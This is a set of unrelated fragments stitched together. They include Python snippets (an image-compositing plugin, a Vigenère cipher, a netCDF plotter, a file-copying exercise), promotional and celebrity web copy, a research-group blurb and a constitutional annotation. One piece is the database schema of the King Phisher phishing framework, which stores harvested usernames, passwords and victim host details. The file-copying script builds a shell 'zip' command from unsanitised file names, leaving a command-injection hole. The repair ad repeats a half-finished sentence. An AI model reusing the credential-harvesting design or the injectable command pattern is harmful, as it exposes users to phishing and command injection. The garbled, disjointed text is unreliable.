vbox.add_widget(hbox, stretch=0)
# spacer
vbox.add_widget(Widgets.Label(''), stretch=1)
top.add_widget(sw, stretch=1)
btns = Widgets.HBox()
btns.set_border_width(4)
btns.set_spacing(4)
btn = Widgets.Button("Close")
btn.add_callback('activated', lambda w: self.close())
btns.add_widget(btn)
btns.add_widget(Widgets.Label(''), stretch=1)
top.add_widget(btns, stretch=0)
container.add_widget(top, stretch=1)
self.gui_up = True
def _gui_config_layers(self):
# remove all old scales
self.logger.debug("removing layer alpha controls")
self.w.scales.remove_all()
self.logger.debug("building layer alpha controls")
# construct a new vbox of alpha controls
captions = []
num_layers = self.limage.num_layers()
for i in range(num_layers):
layer = self.limage.get_layer(i)
captions.append((layer.name+':', 'label', 'layer_%d' % i, 'hscale'))
w, b = Widgets.build_info(captions)
self.w.update(b)
for i in range(num_layers):
layer = self.limage.get_layer(i)
adj = b['layer_%d' % (i)]
lower, upper = 0, 100
adj.set_limits(lower, upper, incr_value=1)
#adj.set_decimals(2)
adj.set_value(int(layer.alpha * 100.0))
#adj.set_tracking(True)
adj.add_callback('value-changed', self.set_opacity_cb, i)
self.logger.debug("adding layer alpha controls")
self.w.scales.set_widget(w)
def new_cb(self):
#self.fitsimage.clear()
name = "composite%d" % (self.count)
self.limage = ComposeImage(logger=self.logger, order='RGB')
# Alpha or RGB composition?
index = self.w.compose_type.get_index()
if index == 0:
self.limage.compose = 'alpha'
else:
self.limage.compose = 'rgb'
self._gui_config_layers()
self.limage.set(name=name, nothumb=True)
def _get_layer_attributes(self):
# Get layer name
idx = self.limage.num_layers()
if self.limage.compose == 'rgb':
idx = min(idx, 2)
names = ['Red', 'Green', 'Blue']
name = names[idx]
else:
name = 'layer%d' % (idx)
# Get alpha
alpha = 1.0
bnch = Bunch.Bunch(name=name, alpha=alpha, idx=idx)
return bnch
def insert_image(self, image):
if self.limage is None:
self.new_cb()
nlayers = self.limage.num_layers()
if (self.limage.compose == 'rgb') and (nlayers >= 3):
self.fv.show_error("There are already 3 layers")
return
elif nlayers == 0:
# populate metadata from first layer
metadata = image.get_metadata()
self.limage.update_metadata(metadata)
attrs = self._get_layer_attributes()
self.limage.insert_layer(attrs.idx, image, name=attrs.name,
alpha=attrs.alpha)
self._gui_config_layers()
self.logger.debug("setting layer image")
self.fitsimage.set_image(self.limage)
def insert_cb(self):
image = self.fitsimage.get_image()
self.insert_image(image)
def drop_file_cb(self, viewer, paths):
self.logger.info("dropped files: %s" % str(paths))
for path in paths[:3]:
image = self.fv.load_image(path)
self.insert_image(image)
return True
def set_opacity_cb(self, w, val, idx):
alpha = val / 100.0
self.limage.set_alpha(idx, alpha)
def _alphas_controls_to_layers(self):
self.logger.debug("updating layers in %s from controls" % self.limage)
num_layers = self.limage.num_layers()
vals = []
for i in range(num_layers):
alpha = self.w['layer_%d' % i].get_value() / 100.0
vals.append(alpha)
self.logger.debug("%d: alpha=%f" % (i, alpha))
i += 1
self.limage.set_alphas(vals)
def _alphas_layers_to_controls(self):
self.logger.debug("updating controls from %s" % self.limage)
num_layers = self.limage.num_layers()
for i in range(num_layers):
layer = self.limage.get_layer(i)
self.logger.debug("%d: alpha=%f" % (i, layer.alpha))
ctrlname = 'layer_%d' % (i)
if ctrlname in self.w:
self.w[ctrlname].set_value(layer.alpha * 100.0)
i += 1
def add_to_channel_cb(self):
image = self.limage.copy()
name = "composite%d" % (self.count)
self.count += 1
image.set(name=name)
self.fv.add_image(name, image)
def save_as_file(self, path, image, order='RGB'):
if not have_PIL:
raise Exception("You need to install PIL or pillow to save images")
data = image.get_data()
viewer = self.fitsimage
rgbmap = viewer.get_rgbmap()
vmin, vmax = 0, rgbmap.get_hash_size() - 1
# Cut levels on the full image, with settings from viewer
autocuts = viewer.autocuts
loval, hival = viewer.get_cut_levels()
data = autocuts.cut_levels(data, loval, hival,
vmin=vmin, vmax=vmax)
# result becomes an index array fed to the RGB mapper
if not numpy.issubdtype(data.dtype, numpy.dtype('uint')):
data = data.astype(numpy.uint)
# get RGB array using settings from viewer
rgbobj = rgbmap.get_rgbarray(data, order=order,
image_order='RGB')
data = rgbobj.get_array(order)
# Save image using PIL
p_image = Image.fromarray(data)
p_image.save(path)
def save_as_cb(self):
path = str(self.entry2.get_text()).strip()
if not path.startswith('/'):
path = os.path.join('.', path)
image = self.fitsimage.get_image()
self.fv.nongui_do(self.fv.error_wrap, self.save_as_file, path, image)
def instructions(self):
self.tw.set_text("""Drag R, then G then B images to the window. Adjust cut levels and contrast as desired.
Then manipulate channel mix using the sliders.""")
def close(self):
self.fv.stop_local_plugin(self.chname, str(self))
return True
def start(self):
self.instructions()
# start ruler drawing operation
p_canvas = self.fitsimage.get_canvas()
try:
obj = p_canvas.getObjectByTag(self.layertag)
except KeyError:
# Add ruler layer
p_canvas.add(self.canvas, tag=self.layertag)
self.resume()
def pause(self):
self.canvas.ui_setActive(False)
def resume(self):
self.canvas.ui_setActive(True)
def stop(self):
# remove the canvas from the image
p_canvas = self.fitsimage.get_canvas()
try:
p_canvas.deleteObjectByTag(self.layertag)
except:
pass
self.canvas.ui_setActive(False)
self.fv.showStatus("")
self.gui_up = False
def redo(self):
pass
def __str__(self):
return 'compose'
#END
|
The popular theatre and television actor Joe Minoso is best known for his appearance in the popular NBC's Chicago Fire. Recently in 2017, the Chicago Fire star who needed help from the Firefighters for himself after getting trapped in an elevator earlier this year has a net worth of $250,000.
Let's go through his brief career and try to find out how much Joe earns; his salary, source of income, awards, and achievements. So, without further delay, let's start.
The 38-year-old handsome hunk is originally from the Bronx, New York from where he completed his schooling. While still in school, Joe saw his first girlfriend in a school play and then decided he wanted to act as well. It's true; love can make you do things that you never thought is possible.
His girlfriend then took him backstage where she introduced him to the crew. A year later, he was auditioning for a role in the production of Dracula.
After he completed his graduation from Adelphi University with a Bachelor's degree in Fine Arts and Northern Illinois University with a Master's in fine arts, Joe Minoso began his professional career working at Chicago's Teatro Vista, the largest Latino theater company in the Midwest.
After a long journey, Joe currently plays the role of a firefighter on NBC's Chicago Fire. Recently, he was rescued by real Chicago Firefighters after getting trapped in an elevator. Quite a coincidence!
Joe, who started his acting career after falling in love has now successfully established himself as one of the renowned television personality and has earned a lavish lifestyle. Joe Minoso earns a massive salary, from his acting career and endorsements, that adds up to his current net worth of $250,000.
He has been nominated for five times for Best Supporting Actor - Television for Chicago Fire but never became a winner. We hope he will soon add many awards to his achievement list.
Joe also works for the social cause as in 2015, Joe hosted the inaugural WhirlyCruz Cup at WhirlyBall (is like a cross between basketball, hockey, lacrosse and bumper cars.) in the Logan Square area to raise money for the 100 Club of Chicago that benefits the families of fallen police officers and firefighters.
Here we would also like to add something about his lavish wedding. Check out the Video where he talks about his wedding day.
The Chicago Fire star is doing great in his career. We wish him all the very best for his future and hope he achieves more success in the coming days.
|
#########################################################################################
#################### HOW TO USE ##########################
#########################################################################################
# This takes input from the terminal so run (in the proper cd): #
# 'python vigenere_plaintext_encrypt.py textFile.txt key' #
# Make sure the file is in the same folder as this script #
# You can also directly input the plain text: #
# 'python vigenere_plaintext_encrypt.py ThisIsPlainTextCamelCasing key' #
# #
# so obviously the first variable is the plaintext with no spaces allowed #
# and the key is an arbitrary length you use to encode the words #
# #
# #
# #
# For decrypting your code check the brother script 'vigenere_plaintext_decrypt.py' #
#########################################################################################
#########################################################################################
# Created by Craig O'Connor - Thursday, August 15, 2013 #
#########################################################################################
from sys import argv
script, plain_text, key = argv
plain_text_string = "%s" % plain_text
if ".txt" in plain_text_string:
with open(plain_text_string, 'r') as f:
plain_text_string = f.read()
plain_text_string = plain_text_string.lower()
key_string = "%s" % key
key_string = key_string.lower()
plain_text_num = []
key_num = []
encryption_val = []
encryption_char = ""
#Make sure the key length is long enough to convert the plaintext
while len(key_string) < len(plain_text_string):
key_string += key_string
#This is our value system using a dictionary for a table
num_char = { 0 : 'a', 1 : 'b', 2 : 'c', 3 : 'd', 4 : 'e', 5 : 'f', 6 : 'g', 7 : 'h', 8 : 'i',
9 : 'j', 10 : 'k', 11 : 'l', 12 : 'm', 13 : 'n', 14 : 'o', 15 : 'p', 16 : 'q',
17 : 'r', 18 : 's', 19 : 't', 20 : 'u', 21 : 'v', 22 : 'w', 23 : 'x', 24 : 'y',
25 : 'z' }
#lets convert the plain_text and key into there character values and place each value in its own compartment
for i, c in enumerate(plain_text_string):
for value, char in num_char.iteritems():
if char == c:
plain_text_num.append(value)
for i, c in enumerate(key_string):
for value, char in num_char.iteritems():
if char == c:
key_num.append(value)
#Create encryption values
for i in range(0,len(plain_text_num)):
#Cipher_value = (Message_value + Key_value) mod 26
encryption_val.append((plain_text_num[i] + key_num[i]) % 26)
#Finish up, turn those values into the proper characters:
for i in range(0,len(encryption_val)):
for value, char in num_char.iteritems():
if value == encryption_val[i]:
encryption_char += char
print (encryption_char)
with open('cipher_text.txt', 'w') as f:
f.write(encryption_char)
|
Professional Range Repair Lemon Grove out of cooking. Any Issue can give us a hint that the range is not working well. But first it is very important to know how your oven work.
Factory Trained Range Technicians in Lemon Grove might not advance, maybe your gas igniter will glow but it will not light, while broiling there is no sign of heat, and believe it or not maybe the oven is too hot. Yes, this can be an issue as it will eventually cook your food faster but it will burn in no time. There are other trouble issues depending the model of your rang or oven such as the program board will not program or maybe the door will not open after finishing a cycle. So before attempting to do this kind of maintenance at home or any cleaning of parts that you suspect may be causing trouble to your range: call a range appliance repair technician to maybe minimize the possibility of any electric shock. There are so many models of ranges, it is most important to know yours before giving a call for service range repair in la he door will not open after finishing a cycle. So before attempting to do this kind of maintenance at home or any cleaning of parts that you suspect may be causing trouble to your range: call a range appliance repair technician to maybe minimize the possibility of any electric shock. There are so many models of ranges, it is most important to know yours before giving a call for service.
Range Repair Lemon Grove (323) 999-5434 My Appliance Repair Lemon Grove We specialize in all Range. Schedule your service call today and receive a 10% off labor discount.
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/server/database/models.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import datetime
import logging
import operator
from king_phisher import errors
from king_phisher import utilities
from king_phisher.server import signals
import sqlalchemy
import sqlalchemy.event
import sqlalchemy.ext.declarative
import sqlalchemy.orm
DATABASE_TABLE_REGEX = '[a-z_]+'
"""A regular expression which will match all valid database table names."""
SCHEMA_VERSION = 7
"""The schema version of the database, used for compatibility checks."""
database_tables = {}
"""A dictionary which contains all the database tables and their column names."""
database_table_objects = {}
"""A dictionary which contains all the database tables and their primitive objects."""
logger = logging.getLogger('KingPhisher.Server.Database.Models')
def current_timestamp(*args, **kwargs):
"""
The function used for creating the timestamp used by database objects.
:return: The current timestamp.
:rtype: :py:class:`datetime.datetime`
"""
return datetime.datetime.utcnow()
def get_tables_with_column_id(column_id):
"""
Get all tables which contain a column named *column_id*.
:param str column_id: The column name to get all the tables of.
:return: The list of matching tables.
:rtype: set
"""
return set(x[0] for x in database_tables.items() if column_id in x[1])
def forward_signal_delete(mapper, connection, target):
signals.safe_send('db-table-delete', logger, target.__tablename__, mapper=mapper, connection=connection, target=target)
def forward_signal_insert(mapper, connection, target):
signals.safe_send('db-table-insert', logger, target.__tablename__, mapper=mapper, connection=connection, target=target)
def forward_signal_update(mapper, connection, target):
signals.safe_send('db-table-update', logger, target.__tablename__, mapper=mapper, connection=connection, target=target)
def register_table(table):
"""
Register a database table. This will populate the information provided in
DATABASE_TABLES dictionary. This also forwards signals to the appropriate
listeners within the :py:mod:`server.signal` module.
:param cls table: The table to register.
"""
columns = tuple(col.name for col in table.__table__.columns)
database_tables[table.__tablename__] = columns
database_table_objects[table.__tablename__] = table
sqlalchemy.event.listen(table, 'before_delete', forward_signal_delete)
sqlalchemy.event.listen(table, 'before_insert', forward_signal_insert)
sqlalchemy.event.listen(table, 'before_update', forward_signal_update)
return table
class BaseRowCls(object):
"""
The base class from which other database table objects inherit from.
Provides a standard ``__repr__`` method and default permission checks which
are to be overridden as desired by subclasses.
"""
__repr_attributes__ = ()
"""Attributes which should be included in the __repr__ method."""
is_private = False
"""Whether the table is only allowed to be accessed by the server or not."""
def __repr__(self):
description = "<{0} id={1} ".format(self.__class__.__name__, repr(self.id))
for repr_attr in self.__repr_attributes__:
description += "{0}={1!r} ".format(repr_attr, getattr(self, repr_attr))
description += '>'
return description
def assert_session_has_permissions(self, *args, **kwargs):
"""
A convenience function which wraps :py:meth:`~.session_has_permissions`
and raises a :py:exc:`~king_phisher.errors.KingPhisherPermissionError`
if the session does not have the specified permissions.
"""
if self.session_has_permissions(*args, **kwargs):
return
raise errors.KingPhisherPermissionError()
def session_has_permissions(self, access, session):
"""
Check that the authenticated session has the permissions specified in
*access*. The permissions in *access* are abbreviated with the first
letter of create, read, update, and delete.
:param str access: The desired permissions.
:param session: The authenticated session to check access for.
:return: Whether the session has the desired permissions.
:rtype: bool
"""
if self.is_private:
return False
access = access.lower()
for case in utilities.switch(access, comp=operator.contains, swapped=True):
if case('c') and not self.session_has_create_access(session):
break
if case('r') and not self.session_has_read_access(session):
break
if case('u') and not self.session_has_update_access(session):
break
if case('d') and not self.session_has_delete_access(session):
break
else:
return True
return False
def session_has_create_access(self, session):
if self.is_private:
return False
return True
def session_has_delete_access(self, session):
if self.is_private:
return False
return True
def session_has_read_access(self, session):
if self.is_private:
return False
return True
def session_has_read_prop_access(self, session, prop):
return self.session_has_read_access(session)
def session_has_update_access(self, session):
if self.is_private:
return False
return True
Base = sqlalchemy.ext.declarative.declarative_base(cls=BaseRowCls)
metadata = Base.metadata
class TagMixIn(object):
__repr_attributes__ = ('name',)
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
name = sqlalchemy.Column(sqlalchemy.String, nullable=False)
description = sqlalchemy.Column(sqlalchemy.String)
@register_table
class AlertSubscription(Base):
__repr_attributes__ = ('campaign_id', 'user_id')
__tablename__ = 'alert_subscriptions'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
user_id = sqlalchemy.Column(sqlalchemy.String, sqlalchemy.ForeignKey('users.id'), nullable=False)
campaign_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('campaigns.id'), nullable=False)
type = sqlalchemy.Column(sqlalchemy.Enum('email', 'sms', name='alert_subscription_type'), default='sms', server_default='sms', nullable=False)
mute_timestamp = sqlalchemy.Column(sqlalchemy.DateTime)
def session_has_create_access(self, session):
return session.user == self.user_id
def session_has_delete_access(self, session):
return session.user == self.user_id
def session_has_read_access(self, session):
return session.user == self.user_id
def session_has_update_access(self, session):
return session.user == self.user_id
@register_table
class AuthenticatedSession(Base):
__repr_attributes__ = ('user_id',)
__tablename__ = 'authenticated_sessions'
is_private = True
id = sqlalchemy.Column(sqlalchemy.String, primary_key=True)
created = sqlalchemy.Column(sqlalchemy.Integer, nullable=False)
last_seen = sqlalchemy.Column(sqlalchemy.Integer, nullable=False)
user_id = sqlalchemy.Column(sqlalchemy.String, sqlalchemy.ForeignKey('users.id'), nullable=False)
@register_table
class Campaign(Base):
__repr_attributes__ = ('name',)
__tablename__ = 'campaigns'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
name = sqlalchemy.Column(sqlalchemy.String, unique=True, nullable=False)
description = sqlalchemy.Column(sqlalchemy.String)
user_id = sqlalchemy.Column(sqlalchemy.String, sqlalchemy.ForeignKey('users.id'), nullable=False)
created = sqlalchemy.Column(sqlalchemy.DateTime, default=current_timestamp)
reject_after_credentials = sqlalchemy.Column(sqlalchemy.Boolean, default=False)
expiration = sqlalchemy.Column(sqlalchemy.DateTime)
campaign_type_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('campaign_types.id'))
company_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('companies.id'))
# relationships
alert_subscriptions = sqlalchemy.orm.relationship('AlertSubscription', backref='campaign', cascade='all, delete-orphan')
credentials = sqlalchemy.orm.relationship('Credential', backref='campaign', cascade='all, delete-orphan')
deaddrop_connections = sqlalchemy.orm.relationship('DeaddropConnection', backref='campaign', cascade='all, delete-orphan')
deaddrop_deployments = sqlalchemy.orm.relationship('DeaddropDeployment', backref='campaign', cascade='all, delete-orphan')
landing_pages = sqlalchemy.orm.relationship('LandingPage', backref='campaign', cascade='all, delete-orphan')
messages = sqlalchemy.orm.relationship('Message', backref='campaign', cascade='all, delete-orphan')
visits = sqlalchemy.orm.relationship('Visit', backref='campaign', cascade='all, delete-orphan')
@property
def has_expired(self):
if self.expiration is None:
return False
if self.expiration > current_timestamp():
return False
return True
@register_table
class CampaignType(TagMixIn, Base):
__tablename__ = 'campaign_types'
# relationships
campaigns = sqlalchemy.orm.relationship('Campaign', backref='campaign_type')
@register_table
class Company(Base):
__repr_attributes__ = ('name',)
__tablename__ = 'companies'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
name = sqlalchemy.Column(sqlalchemy.String, unique=True, nullable=False)
description = sqlalchemy.Column(sqlalchemy.String)
industry_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('industries.id'))
url_main = sqlalchemy.Column(sqlalchemy.String)
url_email = sqlalchemy.Column(sqlalchemy.String)
url_remote_access = sqlalchemy.Column(sqlalchemy.String)
# relationships
campaigns = sqlalchemy.orm.relationship('Campaign', backref='company', cascade='all')
@register_table
class CompanyDepartment(TagMixIn, Base):
__tablename__ = 'company_departments'
# relationships
messages = sqlalchemy.orm.relationship('Message', backref='company_department')
@register_table
class Credential(Base):
__repr_attributes__ = ('campaign_id', 'username')
__tablename__ = 'credentials'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
visit_id = sqlalchemy.Column(sqlalchemy.String, sqlalchemy.ForeignKey('visits.id'), nullable=False)
message_id = sqlalchemy.Column(sqlalchemy.String, sqlalchemy.ForeignKey('messages.id'), nullable=False)
campaign_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('campaigns.id'), nullable=False)
username = sqlalchemy.Column(sqlalchemy.String)
password = sqlalchemy.Column(sqlalchemy.String)
submitted = sqlalchemy.Column(sqlalchemy.DateTime, default=current_timestamp)
@register_table
class DeaddropDeployment(Base):
__repr_attributes__ = ('campaign_id', 'destination')
__tablename__ = 'deaddrop_deployments'
id = sqlalchemy.Column(sqlalchemy.String, default=lambda: utilities.random_string(16), primary_key=True)
campaign_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('campaigns.id'), nullable=False)
destination = sqlalchemy.Column(sqlalchemy.String)
# relationships
deaddrop_connections = sqlalchemy.orm.relationship('DeaddropConnection', backref='deaddrop_deployment', cascade='all, delete-orphan')
@register_table
class DeaddropConnection(Base):
__repr_attributes__ = ('campaign_id', 'deployment_id', 'visitor_ip')
__tablename__ = 'deaddrop_connections'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
deployment_id = sqlalchemy.Column(sqlalchemy.String, sqlalchemy.ForeignKey('deaddrop_deployments.id'), nullable=False)
campaign_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('campaigns.id'), nullable=False)
visit_count = sqlalchemy.Column(sqlalchemy.Integer, default=1)
visitor_ip = sqlalchemy.Column(sqlalchemy.String)
local_username = sqlalchemy.Column(sqlalchemy.String)
local_hostname = sqlalchemy.Column(sqlalchemy.String)
local_ip_addresses = sqlalchemy.Column(sqlalchemy.String)
first_visit = sqlalchemy.Column(sqlalchemy.DateTime, default=current_timestamp)
last_visit = sqlalchemy.Column(sqlalchemy.DateTime, default=current_timestamp)
@register_table
class Industry(TagMixIn, Base):
__tablename__ = 'industries'
# relationships
companies = sqlalchemy.orm.relationship('Company', backref='industry')
@register_table
class LandingPage(Base):
__repr_attributes__ = ('campaign_id', 'hostname', 'page')
__tablename__ = 'landing_pages'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
campaign_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('campaigns.id'), nullable=False)
hostname = sqlalchemy.Column(sqlalchemy.String, nullable=False)
page = sqlalchemy.Column(sqlalchemy.String, nullable=False)
@register_table
class StorageData(Base):
__repr_attributes__ = ('namespace', 'key', 'value')
__tablename__ = 'storage_data'
is_private = True
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
created = sqlalchemy.Column(sqlalchemy.DateTime, default=current_timestamp)
namespace = sqlalchemy.Column(sqlalchemy.String)
key = sqlalchemy.Column(sqlalchemy.String, nullable=False)
value = sqlalchemy.Column(sqlalchemy.Binary)
@register_table
class Message(Base):
__repr_attributes__ = ('campaign_id', 'target_email')
__tablename__ = 'messages'
id = sqlalchemy.Column(sqlalchemy.String, default=utilities.make_message_uid, primary_key=True)
campaign_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('campaigns.id'), nullable=False)
target_email = sqlalchemy.Column(sqlalchemy.String)
first_name = sqlalchemy.Column(sqlalchemy.String)
last_name = sqlalchemy.Column(sqlalchemy.String)
opened = sqlalchemy.Column(sqlalchemy.DateTime)
opener_ip = sqlalchemy.Column(sqlalchemy.String)
opener_user_agent = sqlalchemy.Column(sqlalchemy.String)
sent = sqlalchemy.Column(sqlalchemy.DateTime, default=current_timestamp)
trained = sqlalchemy.Column(sqlalchemy.Boolean, default=False)
company_department_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('company_departments.id'))
# relationships
credentials = sqlalchemy.orm.relationship('Credential', backref='message', cascade='all, delete-orphan')
visits = sqlalchemy.orm.relationship('Visit', backref='message', cascade='all, delete-orphan')
@register_table
class MetaData(Base):
__repr_attributes__ = ('value_type', 'value')
__tablename__ = 'meta_data'
is_private = True
id = sqlalchemy.Column(sqlalchemy.String, primary_key=True)
value_type = sqlalchemy.Column(sqlalchemy.String, default='str')
value = sqlalchemy.Column(sqlalchemy.String)
@register_table
class User(Base):
__tablename__ = 'users'
id = sqlalchemy.Column(sqlalchemy.String, default=lambda: utilities.random_string(16), primary_key=True)
phone_carrier = sqlalchemy.Column(sqlalchemy.String)
phone_number = sqlalchemy.Column(sqlalchemy.String)
email_address = sqlalchemy.Column(sqlalchemy.String)
otp_secret = sqlalchemy.Column(sqlalchemy.String(16))
# relationships
alert_subscriptions = sqlalchemy.orm.relationship('AlertSubscription', backref='user', cascade='all, delete-orphan')
campaigns = sqlalchemy.orm.relationship('Campaign', backref='user', cascade='all, delete-orphan')
def session_has_create_access(self, session):
return False
def session_has_delete_access(self, session):
return False
def session_has_read_access(self, session):
return session.user == self.id
def session_has_read_prop_access(self, session, prop):
if prop in ('id', 'campaigns'): # everyone can read the id
return True
return self.session_has_read_access(session)
def session_has_update_access(self, session):
return session.user == self.id
@register_table
class Visit(Base):
__repr_attributes__ = ('campaign_id', 'message_id')
__tablename__ = 'visits'
id = sqlalchemy.Column(sqlalchemy.String, default=utilities.make_visit_uid, primary_key=True)
message_id = sqlalchemy.Column(sqlalchemy.String, sqlalchemy.ForeignKey('messages.id'), nullable=False)
campaign_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey('campaigns.id'), nullable=False)
visit_count = sqlalchemy.Column(sqlalchemy.Integer, default=1)
visitor_ip = sqlalchemy.Column(sqlalchemy.String)
visitor_details = sqlalchemy.Column(sqlalchemy.String)
first_visit = sqlalchemy.Column(sqlalchemy.DateTime, default=current_timestamp)
last_visit = sqlalchemy.Column(sqlalchemy.DateTime, default=current_timestamp)
# relationships
credentials = sqlalchemy.orm.relationship('Credential', backref='visit', cascade='all, delete-orphan')
|
The Plant Fungal Interactions Group (PFIG) is interested in the interactions of plants with non-conventional plant associated microbes, both pathogens and health promoting species, where our major focus is on yeasts. We use a multidisciplinary approach that relies heavily on genetics and genomics. We also have a long time interest in ROS signaling, especially in the role of ROS and cell death in plant resistance to fungal pathogens.
|
#!/usr/bin/env python
from numpy import *
from matplotlib.pyplot import *
from sys import exit
try:
from netCDF4 import Dataset as NC
except:
print "netCDF4 is not installed!"
sys.exit(1)
nameroot = "routing"
for dx in ("100", "50", "25", "15", "10", "5"):
basename = nameroot + dx + "km"
filename = basename + ".nc"
print "%s: looking for file ..." % filename
try:
nc = NC(filename, 'r')
except:
print " can't read from file ..."
continue
xvar = nc.variables["x"]
yvar = nc.variables["y"]
x = asarray(squeeze(xvar[:]))
y = asarray(squeeze(yvar[:]))
for varname in ("bwat", "bwp", "psi"): # psi must go after bwat, bwp
print " %s: generating pcolor() image ..." % varname
try:
if varname == "psi":
var = nc.variables["topg"]
else:
var = nc.variables[varname]
except:
print "variable '%s' not found ... continuing ..." % varname
continue
data = asarray(squeeze(var[:])).transpose()
if varname == "bwat":
bwatdata = data.copy()
if varname == "bwp":
bwpdata = data.copy()
if varname == "psi":
# psi = bwp + rho_w g (topg + bwat)
data = bwpdata + 1000.0 * 9.81 * (data + bwatdata)
if varname == "bwat":
units = "m"
barmin = 0.0
barmax = 650.0
scale = 1.0
else:
units = "bar"
barmin = -20.0
barmax = 360.0
scale = 1.0e5
print " [stats: max = %9.3f %s, av = %8.3f %s]" % \
(data.max() / scale, units, data.sum() / (scale * x.size * y.size), units)
pcolor(x / 1000.0, y / 1000.0, data / scale, vmin=barmin, vmax=barmax)
colorbar()
gca().set_aspect('equal')
gca().autoscale(tight=True)
xlabel('x (km)')
ylabel('y (km)')
dxpad = "%03d" % int(dx)
pngfilename = varname + "_" + dxpad + "km" + ".png"
print " saving figure in %s ..." % pngfilename
savefig(pngfilename, dpi=300, bbox_inches='tight')
close()
nc.close()
|
Jolly Rancher Fruit Chews. Same great flavors as the hard candy just in a chewy version. Each box of jolly rancher fruit chews comes in assorted flavors of Blue Raspberry, Cherry , Green Apple and Watermelon. If you enjoy the bold fruity taste of Jolly Ranchers you will also enjoy these chewy treats.
We have all your favorite jolly rancher candy. Jolly rancher sticks in apple and cherry, Jolly rancher hard candy in a 5 pound bulk bag or jolly rancher apple twists, which ever you prefer we have them all.
Each box comes with 12 2.06 boxes of chewy fun.
|
#!/usr/bin/pythonfiles
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
import sys
import re
import os
import shutil
import commands
def get_special_path(dirr_name):
paths=[]
files=os.listdir(dirr_name)
for filee in files:
special=re.search(r'__(\w+\w+)__',filee)
if special:
paths.append( os.path.abspath(filee))
print paths
return paths
def copy_to(path,dirr):
print dirr
efile=get_special_path(path)
if not os.path.exists(dirr):
os.mkdir(dirr)
for each_file in efile:
shutil.copy(each_file,os.path.abspath(dirr))
def zip_to(path,zippath):
efile=get_special_path(path)
for each_file in efile:
cmd='zip -j'+' '+ zippath+' '+ each_file
asd=commands.getstatusoutput(cmd)
def main():
# This basic command line argument parsing code is provided.
# Add code to call your functions below.
# Make a list of command line arguments, omitting the [0] element
# which is the script itself.
args = sys.argv[1:]
if not args:
print "usage: [--todir dir][--tozip zipfile] dir [dir ...]";
sys.exit(1)
# todir and tozip are either set from command line
# or left as the empty string.
# The args array is left just containing the dirs.
todir = ''
if args[0] == '--todir':
todir = args[1]
del args[0:2]
tozip = ''
if args[0] == '--tozip':
tozip = args[1]
del args[0:2]
if len(args) == 0:
print "error: must specify one or more dirs"
sys.exit(1)
# +++your code here+++
# Call your functions
if __name__ == "__main__":
main()
|
The provisions of this Constitution referring to the Governor-General in Council shall be construed as referring to the Governor-General acting with the advice of the Federal Executive Council.
▸ The Executive Council is to be abolished.
▸ The section is apt to mislead ordinary voters. It purports to draw a distinction between sections referring to the “Governor-General” from those which refer to the “Governor-General in Council”. This allows some to argue that powers given to the Governor-General which don’t refer to the Executive Council may be exercised without the Governor-General considering Ministers’ advice. Of course, the distinction is illusory, because to act “with the advice” of Ministers does not mean that the advice will be followed. Quick and Garran at p.707 describe the distinction as “historical and technical, rather than practical or substantial”. Crown powers which originated from common law were vested in the Governor-General if they were not controlled by statute at the time the Constitution was drafted. Other powers which originated from, or were controlled by, statute were vested in the Governor-General in Council. (See also Note 65A.4).
|
# -*- coding: utf-8 -*-
"""
UNIVERSIDADE DE FORTALEZA - UNIFOR
DEPARTAMENTO DE PÓS-GRADUAÇÃO EM INFORMÁTICA APLICADA - PPGIA
Disciplina: Probabilidade e Estatística
Resolução de Exercícios
----
Aluno: Jonas de Araújo Luz Jr. <jonasluzjr@edu.unifor.br>
"""
